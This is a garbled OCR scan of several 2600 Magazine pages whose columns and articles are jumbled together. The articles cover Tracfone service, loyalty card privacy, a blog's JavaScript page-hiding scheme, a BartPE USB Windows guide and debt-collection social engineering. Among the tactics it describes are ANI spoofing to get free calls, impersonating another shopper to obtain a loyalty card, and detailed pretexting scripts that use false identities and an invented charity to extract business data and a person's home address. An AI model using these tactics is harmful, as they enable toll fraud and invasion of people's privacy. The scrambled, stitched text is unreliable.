Mexican billionaire Carlos Slim. w h i c h is designated toT-Mobile. I entered a Seattle Z I P c o d e and was provided a Seattle number. Squealing tires. The S I M card was pre-installed in the handset.

you can make virtually unlimited long distance calls to over 60 countries. Tracfone does not bill for ring time beyond the first 30 seconds. but all minutes cost 10 cents. A T & T is the underlying long distance carrier for domestic calls. a Tracfone brand sold exclusively through Walmart and operating on Verizon's C D M A platform. but dial-around service is available to 60 countries at no additional cost. International calling is also free with Tracfone. W h i l e a basic W A P browser is included.Straight Talk Wireless. This service uses a "backdoor number. tricks. using the same billing platform. O n l y calls that supervise are charged.com • http://thejmart. As it turns out. S M S is allowed (billing 0. • Safelink Wireless: Operates on the Tracfone billing platform. Your minutes roll over if you recharge before they expire. service is primarily sold by the minute with varying rates depending upon whether the phone subscribed offers "double minutes for life" (DMFL) and the number of minutes purchased at once. provided you use a toll-free gateway operated by Auris Technology. the Auris gateway uses only the A N I of your Tracfone for validation. Although monthly plans are available. enter your password." to w h i c h your handset connects w h e n you check your voicemail. with no roaming allowed. you can only visit a pre-approved list of sites linked from the Tracfone portal. Page 14 ^ Page 14 2600 Magazine ' . . me to go home. and stay healthy! • • • .Safelink Wireless. and the AT&T Mobility voicemail platform is used.com/difzip.3 minutes per message sent or received). Additionally. handsets are heavily subsidized (selling for as little as $10) but minutes are more expensive. Tracfone attempts to conceal this number in the firmware by quickly wiping the display. Most interestingly. only headset profiles are allowed. Airtime for most cards expires in 90 days.tracfone.Net10. pardon me for a moment. • Straight Talk: Marketed exclusively through Walmart. This service provides a free phone and 55 monthly cellular minutes free for customers who qualify for a federal lifeLine subsidy (generally welfare recipients). Available in all 50 states. this service is sold with one of two monthly plans costing either $30 (1000 minutes plus 1000 text messages plus 30MB of data) or $45 (unlimited text/talk/data). Attempting to browse other sites yields a "403 Forbidden" error message. • NettO: Similar to the Tracfone product. And. Tracfone bills for calls to customer service. there are a couple of glaring flaws: voicemail and international calling. and to bring this column to close. I'm nearly bent in half from coughing fits.htm This column focuses on the Tracfone-branded service. and billing is apparently not synchronized with the AT&T or Tracfone billing platforms. but is limited in the dial plan to domestic S M S only. It's time for . I was curious how much effort Tracfone made to lock d o w n the network. In general. Voicemail deposits are free with Tracfone.com • http://www. offers both G S M and C D M A service depending upon the area in which subscribed.To some degree. Not surprisingly.. Calling directly into this number from another phone (such as a land line) prompts you to enter your mobile phone number. . http://www. The "backdoor number" is shown briefly on your handset when you hold d o w n the " 1 " key. Bluetooth is also locked down. International calling is blocked. (hosted by the independent LEC Beehive Telephone Company).com http://www. I tested G S M service on the AT&T network. Handsets are more expensive and airtime expires sooner. and codes. but by watching carefully and dialing a few times. U n l i k e AT&T Mobility.com .Tracfone official site.safelinkwireless.Tracfone tips. By spoofing the A N I of any Tracfone w h e n dialing this gateway. O n the other hand.straighttalk.. w h i c h is unusual for a wireless provider.JAR files to themselves as G m a i l attachments). Calls are of acceptable quality. For your reference. a Tracfone product targeted toward recipients of public assistance. international calls cost an extra five cents per minute. Tracfone service is marketed under four different brands: • Tracfone: The most popular service. and forward audio is even sent on calls that do not supervise. Available in 21 states and the District of Columbia. It is possible to download ring tones and some basic applications sold on the Tracfone portal (although some users have worked around this limitation by sending . References http://www. This service includes only Verizon network coverage. Have a safe and phun spring. and I'm now four hours and one minute into my shift. and check your voicemail for free. You can do this. a Tracfone brand with more expensive phones and cheaper airtime. W i t h all of the efforts made in locking d o w n the handsets and S I M cards. you'll be able to capture the number. press * during the announcement.netlO. I was surprised at the friendliness ofTracfone billing. with a one year $100 card available. a VoIP provider.

fcHSHfte by Keeng Tusk I don't know about you. these stores make you be a member of their "exclusive clubs. CVS. only a few individuals within the Kroger organization have access to your information. Another thing-I'm getting sick of these places making a big stink about how it costs nothing to get this card. you can enter the phone number you provided w h e n you applied for your current shopper card (area code + 7 digits). You're in control here." All purchases you make will be added to your "file" as well. though. A n d now. but on a smaller scale. Tom Thumb. the most disturbing thing I've ever read (from the Kroger Shoppers Card FAQ): "If I lose my Kroger Plus Card. Most places don't do this anymore. Don't do them this favor. right? If you don't have a card in these shops. They had been around before. I'm not talking about Sam's or Costco. Kroger. you could go to another store. I would say these cards really started gaining popularity right around or a little before the year 2000. sale price or not. here's a brief explanation." Hassle. as well as countless others. when you're just trying to live a normal everyday life and buy some chicken? Every shopper should be treated equally. but what a hassle! Your time is too precious. don't forget that. The stores listed. don't fret. as those are private "clubs" which you have to pay to be a member and shop there. You just want a damn two-liter bottle of Coca-Cola for $0. the FBI? Since when do you have to be a member of an "exclusive" group to get certain sale prices on items or feel important. Next time you c o m e in with your Kroger Plus Card. as I w o u l d assume grocery store employees w o u l d rather keep everything moving quickly than deal with some big mouth anger-case (like me) w h o might start screaming at them for making them wait. hassle. either. Your information is not kept on-hand at the store. hassle. W e ' r e talking about grocery stores. Ralph's. Sounds like discrimination to me. In fact. the Kroger Shoppers Card FAQ states: " W h y can't the cashier scan a card for me if I forget my Kroger Pius Card? Card integrity is very important to us and scanning a card that has not been issued to an individual w o u l d compromise that integrity. have a system tracking your personal purchases while making you feel like you're getting great deals as some sort of gift from them. If you forget your card. W h o do they think they are. the one where you need the card to get a sale price." This membership process usually entails taking your precious minutes to sign up for the free service and getting a card. contact info and still get the card/sale prices.. can anyone get my personal information? Kroger has established a strong commitment to protecting our customers' privacy. The price you pay for not being a member of this "exclusive club." ^ Spring 2010 Of course you can always provide false • Page 15 • . In order to get these great deals (aka sale prices) on certain goods. employees will normally just scan one for you at the checkout if you don't have one. very annoying. save your receipt w h i c h shows what you couid have saved. mind you. O n the same token you don't need a reason to give them your information. Sure. W h e n these shopper's cards first started. This number is your personal pin linked to your Kroger Plus Card number.99. Also. like they're doing you a favor. Then they w o u l d proceeed to rape you of your personal info whilst making you hold up the line behind you in the process. give the service desk associate your current card ID and home phone number. but items not on sale will be charged the non-sale price. Whatever happened to "the price you see is the price you get?" Very. H e or she can contact the regional loyalty department to activate your personal pin for your next visit. by my observation. but you like T H I S store. Items that are listed "on sale" in the store will be charged the sale price listed. These days. the stores w o u l d con you into thinking you N E E D E D one if you didn't have one right as you w e r e about to pay.99 instead of $1. that you swipe and/or scan when you purchase goods at checkout. If this does not work. here! For those of you unfamiliar with the shopper's card I mentioned above. However. You don't need a reason to want to shop at this store. the list goes on. similar to a credit card. but I have been sick like an idiot since the start of the grocery/ drug store chain "shopper's card" craze. regardless of whether they elect to sign any information over or not.. visit the service desk for a refund of the savings amount.

If you dropped your receipt and didn't think twice. though. rather than a courtesy "opt-out. starting the day after the 2008 on January 6. The shopper's card number is ****'d out.com?2600 George. A n d since I brought up Sam's earlier. on the other hand. but dropped your receipt? A little investigation and social engineering can ensure that somebody w h o found it now knows where you have it set up. living into © t o a m r f t a j "It is 6:40pm. Thanks. Around a 7:30pm . after you told your significant other that you stopped drinking as promised? "Your receipts can and will be used against you in a court of law. If you pop on over to Ralphs. They're still watching you.A few individuals? Illuminati style. tsk. up popped one of the other pages on the site. This type of thing is not limited to grocery chains and "card holder" stores. prints the cardholder's name on the receipt like it's personalized! W h a t is this stationary? Imagine the blackmail that could ensue from something some would consider minor by having your name on a receipt with alcohol purchases. c o m w e b site looked like this: only a few miles from myself. 2009: ^ Page 16 2600 Magazine ' . "Sorry. but I want a card anyway. if you don't have a membership and know the name of a cardholder/member. G o d have mercy. nine months. Tom Thumb.S.000 gaming PC. But don't give them the pleasure! Peace to all 2600 readers and Off the Hook listeners! Keep life fun. showing only the last four digits. Smart thinking! I think they wised up and probably got a lot of n e w customers as a result." O f course. killing three of them and injuring a number of others before shooting himself (http://en. If you entered the right password." Tsk. the page you were looking for could not be found.. ' i p r a r f t i j by Lnkd.org/wiki/2 009_ *»Collier_Township_shooting). I wish I had answers. like a credit card. Hell!" Access to the blog was protected with a simple "password" scheme that constructed the address of the target page by inserting whatever the user entered as the password into the next location's U R L . B A M ! N o w you can now track this card owner's purchases and possibly cause all sorts of other hijinks as well.Wikipedia. a customized 404 error page was displayed saying. for instance. somebody could be tracking your shopping patterns and casing your home as well. and I do c o m m e n d them for this. it was very hard to see this little check box. Just bought that brand new $5. yo. and opened fire on Impact" class. turned off the lights." W i t h a little cleaning up. I have a feeling that it was some sort of California law. Albertson's ditched the w h o l e shopper's card idea altogether a few years ago. 1 am aware that not all data miners are out to get you. 2009. took some guns out of his gym where the women. Bye. you could sign up for this " n e w " shopper's card (Lucky already had the same system) and there was a little check box on the application that said. and also print this information on the receipt." "It is 8:45PM: I chickened out! Shit! I brought the loaded guns. Back when Lucky was bought by Albertsons around 2000 or 2001. He had been blogging about his "exit strategy" for including an aborted attempt election. but I think they used to. Shops such as M i c r o Center keep name and address records on file. about hour and a half to go." However. the script that used on the G e o r g e S o d i n i . Please read the business intelligence article from 25-4. walked a fitness center in a local strip mall about two dozen w o m e n were taking a "Latin bag. "I do not wish to provide my personal info. Ralph! Kroger's receipts do not show the purchaser's name. I wish life could be better for all and the crazy world can somehow run smoother. I wonder if the "privacy policy" for each of these perpetrators mentions anything of this post-purchase printed information. prints the "Ralph's Rewards" card numbers (when the card is used) in full on each receipt. O f course! Always be on the lookout for the fine print. feel free to social engineer yourself a "temporary" card and purchase all you want! Save yourself the annual fee.. everything. P.NET software on August developer 4th. Life is enough of a hassle-maybe I don't want to carry a card with me everywhere! The scary thing about these card accounts (besides the stores tracking all of your purchases unnecessarily) is that vital personal info is sometimes printed directly on your receipt! Ralph's. If it was the wrong password.com and sign up for a "Ralph's Rewards" account with that card number listed.

pass2 .href=pass+". 1 It i n c l u d e d a single form w i t h t w o input fields: (BOO | A-list Stngtes . doni hit the Return key. Date of Birth 1 J (Submit) Date of Death 1 1 (Submit) <p>Take a guess. A page n a m e d " l i v e o r d i e " w a s linked from "Life or D e a t h " o n the site's h o m e page.1965 would be 19650103. s ( r CD "" :::: Add to Amazon Wish tist Java St 6 Mac Tutorials My Birth and Death Dates Take a guess. ! </script> * </head> This simply loads another page in the same directory into the browser.</p> <form name="login"> ctable border="2" cellpadding="3"> <trxtd colspan="2"><b>Date of Birth</b> </tdx/tr> <trxtdxinput name="pass" type="password"x/td> <tdxinput type="button" value=" Submit" onClick= "password (form. Format is an 8-digit yyyymmdd date. value) "x/td> </td> </table> </form> ^ S p r i n g 2010 Page17-J . don't hit the Return key.Chtml> <head> I { f <script language="javascript" type="text/javascript"> function password (pass) if (pass != '') { > " } location. Format is 8-digit Julian. Then click "Submit".old site S S I OS X Keyboa.html". For example. Then click "Submit". January 3. 1965 would be 19650103. January 3. For example.value) "></td> </tr> </table> <table border=2 cellpadding="3"> <trxtd colspan="2"xb>Date of Death</b> </tdx/tr> <trxtdxinput name="pass2" type="password"x/td> ctdxinput type = "button" value="Submit" onClick= "password ( form. pass .

http://216. second level of security on the CrazyGeorge. You could have full access to the source code of the w e b pages and I'll post what w e find at If that page still says the page could not be found and someone else discovers the password to pages. most people will probably forget about cmeta name="robots" content= • "noarchive" *»comcast. I w o u l d suggest adding a meta tag to the head section of the target pages: still be unable to discover the password to the could create a picture gallery where the HTML H T M L pages and other files. that might be the only place the content of the web page survives.. Hopefully { if (pass ! = { the dark side of human nature and a simple security technique. As of this writing. The password that worked during most of the nine months the blog was being created was probably "19600930".163. you could use the same principle for hiding any number of pages. .. The first level used a slightly different version of similar c o d e (again. in my opinion the "Life or Death" question. 2.comcast. To ensure they don't get cached by search engines. Wikipedians must Footnotes <html> <head> <script language="javascript" type="text/javascript"> function password (pass) was renamed when the decision was made. which did passwords for other pages. but there wasn't one . pages said " m y voice will speak forever!**" in your So George. dictionary attack didn't work and neither A } </script> </head> Putting the "password" in the path part of the U R L effectively hides all of the files in a directory behind the same password./crazyg/personal/. w h i c h makes sense for a running blog. blog. keywords http://home. and I checked for an autoresponder.net/~space777/ c o m site to access the "darker side must be hidden" page(s). If anyone does manage to get past the » » c r a z y g / p e r s o n a l / directory. was not have agreed. get the image names from their "src" attricompletely unprotected. levels of hidden pages. manually submit specific yourself. The link labeled "Private" took you another password entry form for access to hidden pages in the from the text. I did check the source code to see if there this article provides some insight into both w ) location. and how the blog page significant also. please let me know by contacting me at get to the " . O n one of his other sites the source code said to e-mail him for the password." W h i l e in this case only one of the two clues led to a page that existed. and set it up so that each valid keyword directs the user to a different hidden page.48/crazyg/. using the passw o r d "crazyg.69. I don't think anyone has gotten past that level yet. W h i l e everyone was focusing on the blog page itself. O n c e you w e r e past that." there w a s a framed navigation bar with a variety of links. You could request the user to enter a "keyword". wherever you are.net/~space777/) The C r a z y G e o r g e . though.W h i l e one input field w o u l d be sufficient to handle multiple passwords. especially if you're trying to make your w e b site or blog infamous. For example. having both allowed displaying the text that provided the clues to what page names needed to be entered. or his cat's name "snippers". because the few sentences I added were deleted. is that the hidden pages won't get unless you indexed by search engines or w e b archive sites. butes in the H T M L and bring up the images O n e disadvantage to this method. name. his girlfriend's first and/or last was a test password commented out in the source code. when you the incident in a short while. } were any clues to the password. It's likely that the blog page was renamed w h e n George's decision changed from " l i v e " to "die. Page 18 ^ Page 18 2600 Magazine ' ." Lnkd. c o m w e b site (which simply framed pages at http://home. 2 O n e unique aspect of this technique is that the only place the password appears on the server is in its file system. but a few snippets of your JavaScript code will survive a bit longer on these pages.href="/"+pass+"/ *»index." since even George w o u l d not have known that the the "big day" was going to be "20090804" until the day before.George would have had to be there. O n c e the domain name expires.html". com?2600. you Contrast this with other places where you can page(s) and all the pictures were protected. cleaned up a bit): had two 1. the " D a t e of Birth. .

but that takes time and requires administrative access. but it is free to download and easy to set up. Configure Firefox with your favorite homepage. They go into the plugins folder in your BartPE Builder folder (the default for the current version is C: \ p e b u i l d e r 3 1 1 0 \ plugin). 1 2. downloaded from h t t p : //www . and Thunderbird are recommended P Bidr v . and plug in the ' C s o : (nld fls ai fles Fo ti «rcoy u t m icue ie rd odr rm hs Setr) . ^ Spring 2010 Page 19 .' i i Puis ign | Hi —' S SI | 1 memory stick. or view private documents using your office machine. You will need the following: • A Windows XP (Service Rack 1 or later) installation disk • A U S B memory stick or card (set as the default boot device in the BIOS) • BartPE Builder. c o m • Firefox installer (as our example). So how do you check emails. but I have reservations about keeping private documents online. „. and Microsoft would probably prefer that you did not use it. default options. or a friend's PC. mk. O p e n Office Portable. create invoices. filename) agreement. Depending on the circumstances. 4. etc. Cet ISO i a e (ne rae m g : etr r Br t C / Y un o P D D I BifiiHI y " laa. as in the above image. installation files. _ _ _ _ _ O t u : (:pble31aBrP) u p t C\eudr10\atE 1 j BrP atE M d otu e a upt | g 8 Coe ln . Every time you access a document. 0 E ule 3 1 1 a Installation frjftfe Suc fcieip ore 1. you might choose to use online applications. BartPE is not an official Microsoft product. org/firefox • Additional BartPE plugins: PEBar. carrying a laptop around is not the answer. n u 2 . Firefox is our example plugin. Unzip the downloaded BartPE Firefox plugin. downloaded from h t t p : / / w w w . and cracking your employer's passwords is generally not considered a good career move. without leaving bits of your personal life in the public domain? For many of us.R O M drive. You could always wipe your office machine's disk clean after use. PE Builder launches: and You will Install BartPE Builder and accept the 3. Surf and set up your bookmarks and Firefox plugins. m o z i l l a . The following guide is meant as a brief starter only. Complete references are available online. 1. people start asking questions. be prompted to accept the then to search for F |§jWl -J i — Bi ud _] installation files. manually point it to the Plugins Plugins are applications that have been configured to work with BartPE. n u / p e b u i l d e r / # d o w n l o a d • PeToUSB. downloaded from h t t p : / / g o c o d i n g . thanks to security restrictions on company networks. Install Firefox and accept the default installation options. If BartPE can't find your zi 11 C D . the page file. but at Windows-only sites. a portable version of Microsoft W i n d o w s that can be booted and run from a memory stick.A Portable Microsoft Windows B y Peter W r e n s h a l l O n e of the most annoying security problems with Microsoft W i n d o w s is the way it stores files. Enter BartPE. -J . and other random locations. 3.R O M drive that has the installation disk (or wherever your "386" folder is). After installation. into the C: \pebuilder3110\plugin\firefox folder. recoverable traces of it are left in the temp folder. . such as Google Docs. You could also use Linux on a bootable memory stick. 2. Place the W i n d o w s XP installation disk i Suc: (ah t W n o s isaein ffs ore pt o i d w ntfto ie) in the C D .Bum vT Dvo: efs .

The pathologically wary reader might prefer to disable on-board disk access entirely. HP. Click the finished. there is most likely a driver issue. If you are still having problems. and getting Bart set up with different menus.net. Other configuraJdlJ£l tions include using an encrypted stick Refresh gets partition.exe. I B M . Of are recover from course.exe in your Bart folder Install to U S B (C: \pebuilder3110). Ensure that Firefox is set to Enabled. i n t e l . both of which are left as exercises for the reader. click the Close button and exit BartPE the Build Building Bart necessary button files. ^Page202600 Magazine ' . com) will help. Click the Plugins button. backgrounds. Copy all of the files from the C : \ P r o g r a m the 6. BartPE provides a portable Windows- u Close like environment with enough security and convenience that w e don't need to worry about prying office reading bureaucrats Start I • Page 20- PeToU5By3(b.0.ntfs = ntfs. still ways traces there to of •". in the X : \ M i n i N T folder).Load] . and When BartPE it will is 1. mass-storage. You will need to download the base. Their driver plugins include a range of modern SATA/SCSI/ Ethernet drivers. 2."'" Enable Disk Format 17 Quick Format F F r Force Volume Dismount Enable LBA (FAT16X) Don't rewrite MBR code Drive Label: | MYBART your personal RAM.Corn our private files. and boot screens. Place PeToUSB. but similar directions.sif file (on your BartPE U S B disk. 3.GoCodirtg. using a semi-colon to comment out N T F S support.Obviously. lost. chipset. not all plugins will require exactly the same process.7 . There are also plenty of other on-line resources that describe driver integration in greater detail. requires equipment. PeToUSB lools Help BartPE will now copy to the memory stick. Run PeToUSB.sys Restart your machine to test. or you don't get an IP. [FileSystems. To do this. and the plugins most c o m e with a readme file containing If the Blue Screen of Death appears during start-up.driverpacks. Files\Mozilla\Firefox Firefox\files folder. select the B I O S option to boot from the memory stick. it will be ready to boot. and then click the Start button. as below: Finish W h e n this is finished. and Dell predominantly use Intel chipsets and controllers in their office workstations.5. as in the image above. remembering to That completes this short overview of BartPE. for and safer in case your memory Destination Drive: (* USB Removable C USB Fixed using T O R PEAK I I I Flash Drive USB Device 1010Mb [H:\] Format Options: R r surfing. Troubleshooting N configure Builder. folder into C:\pebuilder3110\plugin\ dialogue appears. Use W i n d o w s Device Manager to identify the chipset/mass-storage controllers/network hardware of the machine you are booting from. details . but have fun Coogling for other plugins. use Notepad to edit the txtsetup.Source Path To Built BartPE/WinPE Files: | C:\pebuilder3110a\BartPE File Copy Options: F Enable File Copy j Overwrite Always but that For most specialized of us. so the Intel Chipset Identification Utility (http://down * » l o a d c e n t e r . Select your U S B memory stick from the Destination Drive drop-down menu. and L A N packs. try h t t p : // •www.

All the incidents I am about to describe occurred at least six years ago. Because you showed interest. W h a t It Means W h o is there out there that most people deal with everyday who could use this kind of manipulation against you? Principal culprits within the family include domineering husbands or wives. Also. The chief technique that was used to obtain this data was social engineering. Obviously. Now. my attempts took place over the phone. author Bruce Sterling describes social engineering as "fast talk. w e can have a rep call you for a quote and we'll give you free. my true calling was obtaining this incredibly useful information by devious means. I live in Scotland. or businesses that are going to sell you a service? They want your money.. she had simply taken a telephone number from the phone book! A tele-salesman friend of mine at the So W h o Does It? -Page 21^ . the less attention that an engineering attempt draws. fake-outs. I left a long time ago and why should they get free publicity? Sometimes. It's the opening line in a social engineering attempt I used back in 2001.. bring about" So w e can say that the objective of social engineering is to bring about or contrive mutual relations between the engineer and the target he or she is talking to in order to get information or access that one is not entitled to."(colloq. In his excellent book The Hacker Crackdown. I won't mention who they were.. 1940 Hi there. or children who throw a tantrum to get their way. W h a t about telemarketing companies. on most occasions. the people and company names and addresses have been changed to protect the guilty (and my bank balance). Because I live in Britain. impersonation. contrive. and I really need your help. ail individuals wanting something that they have no right to have and manipulating the person with the power to obtain it-social engineering summed up succinctly." This operative had never met that person before. V V Spring 2010< My dictionary describes the two words that make up the phrase social engineering as: social . the most effective social engineering situations are very low key. then it must rank as a complete success. to help our clients make the correct decision to either get their money back through the courts or to write off the debt. my name's Raul Susskind. to sell. that is a complete lie. I once worked in a telemarketing office and was amazed to hear one operative saying on the phone to a randomly dialled person. so I'll try to explain as I go. But you don't often meet these individuals in everyday life. Although my job was mainly to prepare cases and perform administration for our department. or to obtain trust that will lead to information being given or some action being taken.. hackers (the legendary Kevin Mitnick was a master at this). while others just want to cover their backs in case you default on your agreement and they have to take you to court) and will ask questions and have situations come your way in order to determine what they want to know. circa. and professional magicians (misdirection and lies for your viewing pleasure). Telemarketers have got social engineering skills in abundance.Kim Phiiby. com. Social Engineering has had a long and interesting history. the more successful it is.) arrange.i/iflwential Angles by The Third Man "Truth Is A Technical Advantage" . Actually. conning." the Knights of Shadow Fargo 4A were reputed to have persuaded the entire directory assistance team in Fargo to up and leave). so that's what I'll be discussing. I don't do social engineering or investigations any longer. w e had to get information that w e didn't truly have the right to possess. United Kingdom and worked for a debt collection/investigation company for almost seven years. If no one ever realizes that they have been manipulated. the phone company."mutual relations of men or classes of men" engineer ." And although that description does have an energetic "Huggy Bear" kind of ring about it. so there are no colleagues or confidences to protect anymore. but they also want to know about you (albeit for different reasons: some want as much information as they can get. " D o you remember me? I spoke to you at a trade fair about four months ago about our opening a new show home in your area. so I figure it's OK to tell you about them. social engineering can also take place face-to-face but. scamming. It is used extensively by phone phreaks (according to Jason Scott of "Textfiles. some terms I use might sound strange to American readers.

3. like the phone company. He also got his commission. A single piece of information can help to crack a problem. Jargon.g. those of any social engineer) as: 1. unwittingly.time by the name of Alan worked there and he summed up his objectives (and. from head office) will yield better results rather than behaving as an equal (e. Alan got her name and address and a time and date for a representative to visit her. It was uncanny!" H e then explained the reason for his call. I tended to have been given one or two little facts by our clients that came in handy. an address. do you? That's a nice place. I've had a really bad day and this is the last straw" approach is going to work better for you. A social engineer is effectively an actor. but. Take things in stages. M y grandmother actually lives there. Restaurants are susceptible to newspapers and Internet sites that advertise places to eat out. W h a t is it that you want to obtain? A name. Start a dialogue. So how can you and I protect ourselves from social engineering in our businesses and our homes? To answer that. buzzwords are great if you want to sound like the equal of the target. " M y name's Alan and I work for Sunshine Windows in Glasgow. playing his/her character. with conviction and in the right areas! Insider knowledge is exceptionally useful. your business and your private life for all sorts of reasons. worse.. unusually. points designed to build a relationship with the woman on the end of the phone and make it harder for her to say no to him. Gregarious. internal telephone numbers. Close successfully.g. Does your target have a specific jargon they use. !f you're an angry or excitable person."' approach comes over well. names of employees or managers. 2. The approach will vary dramatically depending on the engineer and the target. However. she's four. then using that information to persuade a manager to not ring the orders through the cash registers between 9. Use the jargon fluently. on W a l l a c e Street. you are trying to build a relationship with the target and not all relationships are equal. or lawyers? If you talk the same "language" as your target. Now. an action? The approach will be determined by what it is you want to cause to happen. she sounded just like my little niece-yeah. then the "Look. But all these keystones of the conversation were complete fabrications. As my friend Alan said. and there were no postcode targeted sales and no reduced prices. a fellow employee) of the target. They had all been social misdirection. He got a little girl who put him onto her mother. a puzzled customer or someone from head office can work really well. like identity fraud. O K . Next comes character. Sometimes being lower (e. "You live in Bearsden. isn't he?" can open up the lines of communication and give the impression you are who you say you are. a customer) or higher (e. An engineer first of all has to consider their objective. he's a pain in the neck. Build a relationship. Dittenfriss. whereas a franchise or hotel will jump at the words "head office". show great respect to "accounts payable." A bit of chat ensued and then.. The company didn't even have a new line in conservatories. depending on the information you are looking for. a number. the make of computer and its software are all helpful launch points into interrogating individuals." Remember. So a successful engineer will play to his or her strengths. He then demonstrated this technique for me by calling the next number in the telephone directory." So if you are claiming to be a salesman. We're offering a new line in conservatories and are doing a special campaign to offer all the homes in your postcode reduced prices. Some people are uptight and high strung. "Is that your daughter? W o w . Everybody has a personality. Alan didn't have a niece. The esteemed Emmanuel Goldstein demonstrated this technique at one of the H O P E conferences first obtaining a store number of Taco Bell. Others are laid back. you will be quicker accepted as a member of their tribe. The best and most convincing characters are extensions of your everyday self.05! I would like to stress that you should always ^ Page 22 2600 Magazine ' . these roles should be tailored to your own personality and then to the soft spot of your target. maybe you've met her around?" Not surprisingly. learn personal information about you. A small business will be receptive to customers.g. But this is the kind of thing that is becoming more prevalent each day-people will try to manipulate you to sell a product or. targeting the accounts department of a company. didn't have a gran in Bearsden. then the The Social Engineer "I'm not really sure if you can help me. With the kinds of things I investigated. NaVve. Complaining to a target that "'Opera' isn't working again. Oh. obtaining the VAT or company registration number can give you the bedrock on which to start your second call. Prone to anger. W h a t role are you going to play? A survey-taker? The security officer at reception? Head office? A puzzled customer? A friend of a friend? Ideally. Companies want happy customers so. job titles. Corporations. this article is not a daring expose of telemarketing calls (I can see the headline of 2600 now. you have to believe it yourself. There's a saying in the theatre: "Conviction Convinces.00 and 9. once an engineer has found the person with the data or information needed. it's good if w e examine how social engineering is accomplished. the next step is to build a relationship with them. can you help me?" or that "I've just spoken to Mr. "Telesales Lie! Millions Shocked! Full Exclusive inside!!")-you obviously didn't read this to have your intelligence insulted. O n the first attempt. If you're a nice guy.

I was called into my boss' office. If your character is that of an angry person. "I see. including director's home addresses-more on that later). providing technical services for 23 PC's running Windows NT." "Oh. had an eight-month support contract.: "I know it's not your fault. each one using a computer and that they got technical support from an external IT company named IT Solutions in Bellshill. but that screen is all his. I just wondered if the gentleman had to hot desk. e." "One? Out of how many members of staff?" "23." So from one phone call. W e could then. which was about £2." "OK. W o u l d it be O K for me to send your company a brochure with information on how to get grants from the government to help companies with disabled members of staff?" "Yes.g." That's all. I called their office.600 if it went to warrant sale (where items are seized by the court and are auctioned off to pay the debt owed). I told them I was Ian Mcintosh from Leaf Ltd. Thank you for your help. At the time this event occurred." "Oh. which in turn makes people willing to help you. I informed her I was a travelling rep for a kitchen manufacturer and I had an appointment to speak to James Dunn of Blue Pearl Showrooms. P O Box 1422. but I'm sure I heard of it recently somewhere!) and I was wanting to ask you how many disabled members of staff you employ at Leaf Ltd.. including a special computer screen. That's great. Windows operating system meant that ordinary people off the street would buy it at auction.) in order to guess at its total assets (to see if it was worth taking court action to recover the debt. Glasgow is a big place. Besides." "Wow. trading as Blue Pearl Showrooms. make sure that the target knows that you are angry at the problem you claim you have. Politeness. whom w e shall call James Dunn. I opened the window of my office so that the person on the phone could hear the noise of the traffic. I've heard of them. who's the manager there?" An Example O n e guy. H e was trading as Blue Pearl Showrooms. earns gratitude. Does everybody have a computer in your offices?" "Yes. So I called IT Solutions and was asked who I was. under Scottish law. not at them personally. in theory. (over the phone) the target is ignorant of who you are. Does this staff member have sufficient aids to help him or her perform their job without too many problems?" The Receptionist then outlined the help this member of staff received. The details w e had were "James Dunn. phoned the central post office in Glasgow. Glasgow. W e passed on that information to our client. my name is Alex Kipling. the gentleman in question being partially sighted. trying to eke out a living doing their job. I don't have it in front of me. he could be unlisted in the phone book or living at a girlfriend's address. But he made the deadly mistake of gloatingly telling my boss that w e could never bring him to court because w e didn't know where he lived. It's just something I need for a management meeting I'm going to-could you just confirm our contract details?" Leaf Ltd. w e have one. just to see if w e can provide both them and your company with practical help and assistance. there are mechanisms that deal with this. you must have a large IT department to look after it!" " W e get IT support from IT Solutions in Bellshill. I work for a charity called Disabled Action (which didn't exist at the time. it would have saved a whole heap of time!" Remember. which was greatly magnified to help him see better. If you have given the information they request to identify yourself (if they even ask for it!). Actually. w e learned that the company employed 23 individuals. and got through to a nice lady who dealt with the post boxes. So I decided the weak link was his post office box number. not the director of a limited company. treating them like a human being. Unfortunately." This will make them feel good that they are helping you. That's really commendable. "I wish I had spoken to you earlier. you've been really helpful. and Dunn is a pretty common name. who made me drop every case I was dealing with so I could concentrate on this one. 1 neglected to check my paperwork this morning and I'm out in The Target ^ Spring 2010 Page 23 . "Hello.000). goodbye. yeah. therefore no records would be kept at Companies House (the central location in Edinburgh where limited and public limited company registration details were stored. who sued them and eventually got their money back! I was assigned a job where my department had to determine the size of a certain company (we'll call it Leaf Ltd. seized PC's could be sold at open auction for about £200.be polite to the target-people who work behind phones nowadays are treated like they're subhuman (especially in the UK). a one to 23 ratio. more than enough to cover the original debt and the legal fees. w e find that not many small businesses hire disabled employees. but my boss was furious with the arrogance of the guy and wanted to nail him to the wall. ran a business and owed one of our clients money." "Thank you—I'll get that out to him." "Oh. you are that person! "Ian Mcintosh. I was then asked for a Customer Number. in their mind. They are just ordinary individuals. raise at least £4. please. which I waved aside by saying "It's not a technical query and besides. No.

Instead of following your plight. one of my colleagues once set off a fire alarm to escape a call. the woman bucked up and asked me for the company details. Goodbye!" If you are accused of not being who you say you are: "This is just crazy! W h y the heck would I take on this stupid problem if I'm not who I say I am!" or take the offensive: "Oh.. Ed? Look. so that's no use. W h a t does seem to work is the "angry" approach: "There's a problem. I'll speak to them about it. one can use Companies House to obtain the data. I can imagine the IRS asking me where my accounts are for the years I wasn't in business. registration number. The woman looked at the entry and assured me that I "must have received a prank call. He's going to get a glowing report of your customer services skills. and the company registration number. you're my last throw of the dice. 1 then called Companies House and spoke to a woman who sounded bored. If you call back immediately. you very often get a different Target and can try afresh with them. How To Avoid It ^ Page 24 2600 Magazine ' ." and the next day. well. for free. There was limited information on all registered companies that anyone could access for free on their Internet site: just the company name. you personally must decide what information you will feel comfort-. I've reported it numerous times. Quickly. I can promise you that!" The last ditch "eject. it's. fix it for me!" A case in point-l was assigned to obtain a director of a limited company's home address.. "huh?" and "hmmm. eject!" is to press the hang-up key while you are talking. just a minute. That approach worked because the lady in the post office sympathised with my "position." The supervisor: " U h .. I gave her "my" name (the company director w e were investigating). and with my personality.can you help me?" O n a humourous note.. There are targets like that lady who want to help youyou can usually tell pretty quickly who they are by their having a pleasant smiley voice and sounding like they are earnestly interested in your "problem. Must be a problem on the line. what do you want to check?" "The date the company was formed-if that's been changed. guess what? They're calling up now on the other line. saying they're looking for a certain number that is not yours. Mr. who's your direct supervisor? What's his name? And your name? Right." In my own experience. Dunn isn't answering his telephone. I went away "reassured" and quite delighted with what I learned: 1) the home address. but I really don't recommend you do that! If It All Goes Wrong Page 24 It's important to have a specific framework in mind of what you will and will not answer. I gave her the "angry" treatment I outlined earlier. is still registered here. "All my secretary at the office has is this P O box number.the middle of Glasgow looking for his office and 